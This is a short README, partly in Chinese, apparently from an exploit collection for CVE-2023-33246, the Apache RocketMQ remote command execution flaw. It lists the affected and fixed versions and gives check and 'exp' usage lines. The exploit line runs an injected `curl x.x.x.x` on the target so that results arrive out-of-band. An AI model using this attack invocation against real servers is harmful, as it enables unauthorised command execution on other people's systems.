0day/03-Apache & Tomcat/Apache/CVE-2023-33246 Apache Rocket MQ-RCE/README.md

CVE-2023-33246

影响版本

Apache RocketMQ through 5.1.0

修复方案

upgrade to version 5.1.1 above for using RocketMQ 5.x
4.9.6 above for using RocketMQ 4.x

check

python check.py --ip 127.0.0.1

exp

python check.py --file test.txt --attack --command "curl x.x.x.x"

利用带外显示结果

更新记录

1. 重新优化check 和exp 脚本，合并功能
2. 添加java 版本的检测程序